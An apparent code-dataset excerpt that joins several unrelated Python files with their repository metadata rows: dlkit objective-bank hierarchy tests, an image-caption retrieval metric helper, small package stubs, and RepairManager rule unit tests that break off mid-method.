if not is_never_authz(self.service_config):
self.svc_mgr.alias_objective_bank(self.catalog_to_delete.ident, alias_id)
aliased_catalog = self.svc_mgr.get_objective_bank(alias_id)
assert self.catalog_to_delete.ident == aliased_catalog.ident
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.alias_objective_bank(self.fake_id, alias_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_hierarchy_session_class_fixture(request):
# From test_templates/resource.py::BinHierarchySession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.catalogs = dict()
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
for name in ['Root', 'Child 1', 'Child 2', 'Grandchild 1']:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = name
create_form.description = 'Test ObjectiveBank ' + name
request.cls.catalogs[name] = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.svc_mgr.add_root_objective_bank(request.cls.catalogs['Root'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 1'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 2'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.remove_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
request.cls.svc_mgr.remove_child_objective_banks(request.cls.catalogs['Root'].ident)
request.cls.svc_mgr.remove_root_objective_bank(request.cls.catalogs['Root'].ident)
for cat_name in request.cls.catalogs:
request.cls.svc_mgr.delete_objective_bank(request.cls.catalogs[cat_name].ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_bank_hierarchy_session_test_fixture(request):
# From test_templates/resource.py::BinHierarchySession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_bank_hierarchy_session_class_fixture", "objective_bank_hierarchy_session_test_fixture")
class TestObjectiveBankHierarchySession(object):
"""Tests for ObjectiveBankHierarchySession"""
def test_get_objective_bank_hierarchy_id(self):
"""Tests get_objective_bank_hierarchy_id"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_id_template
hierarchy_id = self.svc_mgr.get_objective_bank_hierarchy_id()
assert isinstance(hierarchy_id, Id)
def test_get_objective_bank_hierarchy(self):
"""Tests get_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_template
if not is_never_authz(self.service_config):
hierarchy = self.svc_mgr.get_objective_bank_hierarchy()
assert isinstance(hierarchy, Hierarchy)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_hierarchy()
def test_can_access_objective_bank_hierarchy(self):
"""Tests can_access_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchySession::can_access_objective_bank_hierarchy_template
assert isinstance(self.svc_mgr.can_access_objective_bank_hierarchy(), bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_root_objective_bank_ids(self):
"""Tests get_root_objective_bank_ids"""
# From test_templates/resource.py::BinHierarchySession::get_root_bin_ids_template
if not is_never_authz(self.service_config):
root_ids = self.svc_mgr.get_root_objective_bank_ids()
assert isinstance(root_ids, IdList)
# probably should be == 1, but we seem to be getting test cruft,
# and I can't pinpoint where it's being introduced.
assert root_ids.available() >= 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_root_objective_bank_ids()
def test_get_root_objective_banks(self):
"""Tests get_root_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::get_root_bins_template
from dlkit.abstract_osid.learning.objects import ObjectiveBankList
if not is_never_authz(self.service_config):
roots = self.svc_mgr.get_root_objective_banks()
assert isinstance(roots, OsidList)
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_root_objective_banks()
def test_has_parent_objective_banks(self):
"""Tests has_parent_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::has_parent_bins_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.has_parent_objective_banks(self.catalogs['Child 1'].ident), bool)
assert self.svc_mgr.has_parent_objective_banks(self.catalogs['Child 1'].ident)
assert self.svc_mgr.has_parent_objective_banks(self.catalogs['Child 2'].ident)
assert self.svc_mgr.has_parent_objective_banks(self.catalogs['Grandchild 1'].ident)
assert not self.svc_mgr.has_parent_objective_banks(self.catalogs['Root'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.has_parent_objective_banks(self.fake_id)
def test_is_parent_of_objective_bank(self):
"""Tests is_parent_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_parent_of_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident), bool)
assert self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Root'].ident, self.catalogs['Child 1'].ident)
assert self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Grandchild 1'].ident)
assert not self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_parent_of_objective_bank(self.fake_id, self.fake_id)
def test_get_parent_objective_bank_ids(self):
"""Tests get_parent_objective_bank_ids"""
# From test_templates/resource.py::BinHierarchySession::get_parent_bin_ids_template
from dlkit.abstract_osid.id.objects import IdList
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_parent_objective_bank_ids(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, IdList)
assert catalog_list.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_parent_objective_bank_ids(self.fake_id)
def test_get_parent_objective_banks(self):
"""Tests get_parent_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::get_parent_bins_template
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_parent_objective_banks(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, OsidList)
assert catalog_list.available() == 1
assert catalog_list.next().display_name.text == 'Root'
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_parent_objective_banks(self.fake_id)
def test_is_ancestor_of_objective_bank(self):
"""Tests is_ancestor_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_ancestor_of_bin_template
if not is_never_authz(self.service_config):
pytest.raises(errors.Unimplemented,
self.svc_mgr.is_ancestor_of_objective_bank,
self.catalogs['Root'].ident,
self.catalogs['Child 1'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_ancestor_of_objective_bank(self.fake_id, self.fake_id)
# self.assertTrue(isinstance(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident),
# bool))
# self.assertTrue(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident))
# self.assertTrue(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Grandchild 1'].ident))
# self.assertFalse(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Child 1'].ident,
# self.catalogs['Root'].ident))
def test_has_child_objective_banks(self):
"""Tests has_child_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::has_child_bins_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.has_child_objective_banks(self.catalogs['Child 1'].ident), bool)
assert self.svc_mgr.has_child_objective_banks(self.catalogs['Root'].ident)
assert self.svc_mgr.has_child_objective_banks(self.catalogs['Child 1'].ident)
assert not self.svc_mgr.has_child_objective_banks(self.catalogs['Child 2'].ident)
assert not self.svc_mgr.has_child_objective_banks(self.catalogs['Grandchild 1'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.has_child_objective_banks(self.fake_id)
def test_is_child_of_objective_bank(self):
"""Tests is_child_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_child_of_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.is_child_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident), bool)
assert self.svc_mgr.is_child_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident)
assert self.svc_mgr.is_child_of_objective_bank(self.catalogs['Grandchild 1'].ident, self.catalogs['Child 1'].ident)
assert not self.svc_mgr.is_child_of_objective_bank(self.catalogs['Root'].ident, self.catalogs['Child 1'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_child_of_objective_bank(self.fake_id, self.fake_id)
def test_get_child_objective_bank_ids(self):
"""Tests get_child_objective_bank_ids"""
# From test_templates/resource.py::BinHierarchySession::get_child_bin_ids_template
from dlkit.abstract_osid.id.objects import IdList
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_child_objective_bank_ids(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, IdList)
assert catalog_list.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_child_objective_bank_ids(self.fake_id)
def test_get_child_objective_banks(self):
"""Tests get_child_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::get_child_bins_template
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_child_objective_banks(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, OsidList)
assert catalog_list.available() == 1
assert catalog_list.next().display_name.text == 'Grandchild 1'
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_child_objective_banks(self.fake_id)
def test_is_descendant_of_objective_bank(self):
"""Tests is_descendant_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_descendant_of_bin_template
if not is_never_authz(self.service_config):
pytest.raises(errors.Unimplemented,
self.svc_mgr.is_descendant_of_objective_bank,
self.catalogs['Child 1'].ident,
self.catalogs['Root'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_descendant_of_objective_bank(self.fake_id, self.fake_id)
# self.assertTrue(isinstance(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident),
# bool))
# self.assertTrue(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Child 1'].ident,
# self.catalogs['Root'].ident))
# self.assertTrue(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Grandchild 1'].ident,
# self.catalogs['Root'].ident))
# self.assertFalse(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident))
def test_get_objective_bank_node_ids(self):
"""Tests get_objective_bank_node_ids"""
# From test_templates/resource.py::BinHierarchySession::get_bin_node_ids_template
# Per the spec, perhaps counterintuitively this method returns a
# node, **not** a IdList...
if not is_never_authz(self.service_config):
node = self.svc_mgr.get_objective_bank_node_ids(self.catalogs['Child 1'].ident, 1, 2, False)
assert isinstance(node, OsidNode)
assert not node.is_root()
assert not node.is_leaf()
assert node.get_child_ids().available() == 1
assert isinstance(node.get_child_ids(), IdList)
assert node.get_parent_ids().available() == 1
assert isinstance(node.get_parent_ids(), IdList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_node_ids(self.fake_id, 1, 2, False)
def test_get_objective_bank_nodes(self):
"""Tests get_objective_bank_nodes"""
# From test_templates/resource.py::BinHierarchySession::get_bin_nodes_template
if not is_never_authz(self.service_config):
node = self.svc_mgr.get_objective_bank_nodes(self.catalogs['Child 1'].ident, 1, 2, False)
assert isinstance(node, OsidNode)
assert not node.is_root()
assert not node.is_leaf()
assert node.get_child_ids().available() == 1
assert isinstance(node.get_child_ids(), IdList)
assert node.get_parent_ids().available() == 1
assert isinstance(node.get_parent_ids(), IdList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_nodes(self.fake_id, 1, 2, False)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_hierarchy_design_session_class_fixture(request):
# From test_templates/resource.py::BinHierarchyDesignSession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.catalogs = dict()
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
for name in ['Root', 'Child 1', 'Child 2', 'Grandchild 1']:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = name
create_form.description = 'Test ObjectiveBank ' + name
request.cls.catalogs[name] = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.svc_mgr.add_root_objective_bank(request.cls.catalogs['Root'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 1'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 2'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.remove_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
request.cls.svc_mgr.remove_child_objective_banks(request.cls.catalogs['Root'].ident)
for cat_name in request.cls.catalogs:
request.cls.svc_mgr.delete_objective_bank(request.cls.catalogs[cat_name].ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_bank_hierarchy_design_session_test_fixture(request):
# From test_templates/resource.py::BinHierarchyDesignSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_bank_hierarchy_design_session_class_fixture", "objective_bank_hierarchy_design_session_test_fixture")
class TestObjectiveBankHierarchyDesignSession(object):
"""Tests for ObjectiveBankHierarchyDesignSession"""
def test_get_objective_bank_hierarchy_id(self):
"""Tests get_objective_bank_hierarchy_id"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_id_template
hierarchy_id = self.svc_mgr.get_objective_bank_hierarchy_id()
assert isinstance(hierarchy_id, Id)
def test_get_objective_bank_hierarchy(self):
"""Tests get_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_template
if not is_never_authz(self.service_config):
hierarchy = self.svc_mgr.get_objective_bank_hierarchy()
assert isinstance(hierarchy, Hierarchy)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_hierarchy()
def test_can_modify_objective_bank_hierarchy(self):
"""Tests can_modify_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchyDesignSession::can_modify_bin_hierarchy_template
assert isinstance(self.session.can_modify_objective_bank_hierarchy(), bool)
def test_add_root_objective_bank(self):
"""Tests add_root_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::add_root_bin_template
# this is tested in the setUpClass
if not is_never_authz(self.service_config):
roots = self.session.get_root_objective_banks()
assert isinstance(roots, OsidList)
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_root_objective_bank(self.fake_id)
def test_remove_root_objective_bank(self):
"""Tests remove_root_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::remove_root_bin_template
if not is_never_authz(self.service_config):
roots = self.session.get_root_objective_banks()
assert roots.available() == 1
create_form = self.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'new root'
create_form.description = 'Test ObjectiveBank root'
new_objective_bank = self.svc_mgr.create_objective_bank(create_form)
self.svc_mgr.add_root_objective_bank(new_objective_bank.ident)
roots = self.session.get_root_objective_banks()
assert roots.available() == 2
self.session.remove_root_objective_bank(new_objective_bank.ident)
roots = self.session.get_root_objective_banks()
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_root_objective_bank(self.fake_id)
def test_add_child_objective_bank(self):
"""Tests add_child_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::add_child_bin_template
if not is_never_authz(self.service_config):
# this is tested in the setUpClass
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert isinstance(children, OsidList)
assert children.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_child_objective_bank(self.fake_id, self.fake_id)
def test_remove_child_objective_bank(self):
"""Tests remove_child_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::remove_child_bin_template
if not is_never_authz(self.service_config):
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert children.available() == 2
create_form = self.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'test child'
create_form.description = 'Test ObjectiveBank child'
new_objective_bank = self.svc_mgr.create_objective_bank(create_form)
self.svc_mgr.add_child_objective_bank(
self.catalogs['Root'].ident,
new_objective_bank.ident)
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert children.available() == 3
self.session.remove_child_objective_bank(
self.catalogs['Root'].ident,
new_objective_bank.ident)
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert children.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objective_bank(self.fake_id, self.fake_id)
def test_remove_child_objective_banks(self):
"""Tests remove_child_objective_banks"""
# From test_templates/resource.py::BinHierarchyDesignSession::remove_child_bins_template
if not is_never_authz(self.service_config):
children = self.session.get_child_objective_banks(self.catalogs['Grandchild 1'].ident)
assert children.available() == 0
create_form = self.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'test great grandchild'
create_form.description = 'Test ObjectiveBank child'
new_objective_bank = self.svc_mgr.create_objective_bank(create_form)
self.svc_mgr.add_child_objective_bank(
self.catalogs['Grandchild 1'].ident,
new_objective_bank.ident)
children = self.session.get_child_objective_banks(self.catalogs['Grandchild 1'].ident)
assert children.available() == 1
self.session.remove_child_objective_banks(self.catalogs['Grandchild 1'].ident)
children = self.session.get_child_objective_banks(self.catalogs['Grandchild 1'].ident)
assert children.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objective_banks(self.fake_id)
| 52.001975 | 176 | 0.707613 | 25,093 | 210,608 | 5.598693 | 0.017096 | 0.046267 | 0.021012 | 0.035056 | 0.940052 | 0.904526 | 0.871213 | 0.847119 | 0.818155 | 0.789591 | 0 | 0.002673 | 0.207703 | 210,608 | 4,049 | 177 | 52.014818 | 0.839258 | 0.166722 | 0 | 0.72555 | 0 | 0 | 0.075364 | 0.041931 | 0 | 0 | 0 | 0 | 0.124196 | 1 | 0.114044 | false | 0.031472 | 0.015905 | 0 | 0.138409 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5588e32b4c8b934ec2319226da14ea6845309704 | 1,547 | py | Python | machine_translation_vision/utils/im_retrieval_eval.py | Eurus-Holmes/VAG-NMT | 38095c4a5477a0e7e2fa1592e8401aa9cddf2beb | [
"Apache-2.0"
] | 12 | 2019-12-28T12:55:27.000Z | 2022-02-10T00:19:53.000Z | machine_translation_vision/utils/im_retrieval_eval.py | wonderseen/OVC-MMT | b982038ea1295cc038b8dcbca11aa81d318f7a49 | [
"MIT"
] | 1 | 2021-02-25T05:42:31.000Z | 2022-01-02T17:54:16.000Z | machine_translation_vision/utils/im_retrieval_eval.py | wonderseen/OVC-MMT | b982038ea1295cc038b8dcbca11aa81d318f7a49 | [
"MIT"
] | 3 | 2020-05-07T19:13:41.000Z | 2021-02-19T11:26:00.000Z | import torch
import numpy as np
def t2i(images, captions):
"""
Text -> Image
Images: (N,K) matrix of images
Captions: (N,K) matrix of cpations
"""
npts = images.shape[0] #Define the number of images
#Initialize the ranks
ranks = np.zeros(npts)
for index in range(npts):
#Get query captions
queries = captions[index].unsqueeze(0)
#Compute Scores
d = torch.mm(queries, images.t())
d_sorted, inds = torch.sort(d, descending=True)
inds = inds.squeeze(0).cpu().numpy()
ranks[index] = np.where(inds == index)[0][0]
#compute metrics
r1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks)
r5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks)
r10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks)
medr = np.floor(np.median(ranks)) + 1
return (r1, r5, r10, medr)
def i2t(images, captions):
"""
Text -> Image
Images: (N,K) matrix of images
Captions: (N,K) matrix of cpations
"""
npts = images.shape[0] #Define the number of images
#Initialize the ranks
ranks = np.zeros(npts)
for index in range(npts):
#Get query captions
queries = images[index].unsqueeze(0)
#Compute Scores
d = torch.mm(queries, captions.t())
d_sorted, inds = torch.sort(d, descending=True)
inds = inds.squeeze(0).cpu().numpy()
ranks[index] = np.where(inds == index)[0][0]
#compute metrics
r1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks)
r5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks)
r10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks)
medr = np.floor(np.median(ranks)) + 1
return (r1, r5, r10, medr) | 26.672414 | 56 | 0.648998 | 254 | 1,547 | 3.944882 | 0.23622 | 0.047904 | 0.041916 | 0.053892 | 0.934132 | 0.934132 | 0.934132 | 0.934132 | 0.934132 | 0.848303 | 0 | 0.053459 | 0.177763 | 1,547 | 58 | 57 | 26.672414 | 0.734277 | 0.224952 | 0 | 0.733333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
559804c13775200151c5e9cfeb3fd26a94e45cbe | 86 | py | Python | datebar/__init__.py | Neulana/datebar | e92191c341f6d287da244f0d47da238fbdfbdc52 | [
"MIT"
] | 18 | 2018-03-20T23:05:14.000Z | 2020-05-27T17:02:52.000Z | datebar/__init__.py | Neulana/datebar | e92191c341f6d287da244f0d47da238fbdfbdc52 | [
"MIT"
] | null | null | null | datebar/__init__.py | Neulana/datebar | e92191c341f6d287da244f0d47da238fbdfbdc52 | [
"MIT"
] | 3 | 2018-03-21T00:50:38.000Z | 2018-03-21T02:13:39.000Z | from .date_bar import draw
from .date_bar import get_percent
def main():
draw()
| 12.285714 | 33 | 0.72093 | 14 | 86 | 4.214286 | 0.642857 | 0.271186 | 0.372881 | 0.576271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197674 | 86 | 6 | 34 | 14.333333 | 0.855072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
e9aa237568d67a2150bde403ebcf0ce059aded5b | 48 | py | Python | tests/versioned-libs/testlib-1.0/testlib.py | mitsuhiko/multiversion | 3e7c6e1b95b73be633f498d381345b49a877a857 | [
"BSD-3-Clause"
] | 37 | 2015-11-05T03:40:40.000Z | 2021-11-22T23:18:19.000Z | tests/versioned-libs/testlib-1.0/testlib.py | farizrahman4u/multiversion | 4f6a05b555ecdb721d01da0b39da68270b29476c | [
"BSD-3-Clause"
] | 1 | 2019-05-17T08:16:21.000Z | 2019-05-17T08:21:07.000Z | tests/versioned-libs/testlib-1.0/testlib.py | farizrahman4u/multiversion | 4f6a05b555ecdb721d01da0b39da68270b29476c | [
"BSD-3-Clause"
] | 9 | 2015-05-11T03:40:55.000Z | 2022-02-07T16:22:15.000Z | def a_function():
return 'from version 1.0'
| 16 | 29 | 0.666667 | 8 | 48 | 3.875 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.208333 | 48 | 2 | 30 | 24 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
e9c0fd7170125382af88baed67364549b8606524 | 15,254 | py | Python | src/RepairManager/test/test_rule.py | Anbang-Hu/DLWorkspace | 09d82aa5efd4dc9523fd956f913f73e53a85c3c2 | [
"MIT"
] | null | null | null | src/RepairManager/test/test_rule.py | Anbang-Hu/DLWorkspace | 09d82aa5efd4dc9523fd956f913f73e53a85c3c2 | [
"MIT"
] | null | null | null | src/RepairManager/test/test_rule.py | Anbang-Hu/DLWorkspace | 09d82aa5efd4dc9523fd956f913f73e53a85c3c2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import logging
import os
import sys
import unittest
sys.path.append(os.path.abspath("../src/"))
from util import State, Node, Job
from rule import Rule, UnschedulableRule, K8sGpuRule, \
DcgmEccDBERule, InfinibandRule, IPoIBRule, NvPeerMemRule, NVSMRule, \
instantiate_rules
logger = logging.getLogger(__name__)
class MockPrometheusUtil(object):
def __init__(self):
self.data = []
def query(self, query):
try:
return self.data.pop(0)
except IndexError:
return None
class TestRuleInstantiation(unittest.TestCase):
def test_rule_instantiation(self):
# Sanity check on all rules
rules = instantiate_rules()
for rule in rules:
self.assertTrue(rule.name in Rule.subclasses)
class TestRule(unittest.TestCase):
def create_rule(self):
self.rule = Rule("dummy_metric")
def setUp(self):
self.create_rule()
self.rule.prometheus_util = MockPrometheusUtil()
self.job = Job("job1", "user1", "vc1")
self.node = Node("node1",
"192.168.0.1",
True,
False,
"Standard_ND24rs",
4,
4,
4,
State.IN_SERVICE,
infiniband=["mlx4_0:1", "mlx4_1:1"],
ipoib=["ib0", "ib1"],
nv_peer_mem=1,
nvsm=True)
self.node.jobs = {"job1": self.job}
def update_data_and_validate(self, query_data):
for q_data in query_data:
self.rule.prometheus_util.data.append(q_data)
self.rule.update_data()
i = 0
for metric in self.rule.metrics:
self.assertEqual(query_data[i]["data"]["result"],
self.rule.data["current"][metric])
i += 1
self.assertEqual(query_data[i]["data"]["result"],
self.rule.data[self.rule.stat][metric])
i += 1
def test_check_health(self):
pass
def test_prepare(self):
# When there is a job on the node
self.node.jobs = [self.job]
if self.rule.wait_for_jobs:
self.assertFalse(self.rule.prepare(self.node))
# When there is no job on the node
self.node.jobs = []
self.assertTrue(self.rule.prepare(self.node))
class TestUnschedulableRule(TestRule):
def create_rule(self):
self.rule = UnschedulableRule()
def test_check_health(self):
# Node is marked as unschedulable but not in repair cycle.
# Wait for admin to do manual repair
self.node.unschedulable = True
self.node.repair_cycle = False
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
# Node is marked as unschedulable and in repair cycle.
self.node.repair_cycle = True
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# Node is schedulable
self.node.unschedulable = False
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestK8sGpuRule(TestRule):
def create_rule(self):
self.rule = K8sGpuRule()
def test_check_health(self):
# expected > total && total > allocatable
self.node.gpu_total = 3
self.node.gpu_allocatable = 2
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# expected > total && total == allocatable
self.node.gpu_total = 3
self.node.gpu_allocatable = 3
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# expected == total && total > allocatable
self.node.gpu_total = 4
self.node.gpu_allocatable = 3
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# expected == total == allocatable
self.node.gpu_total = 4
self.node.gpu_allocatable = 4
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestDcgmEccDBERule(TestRule):
def create_rule(self):
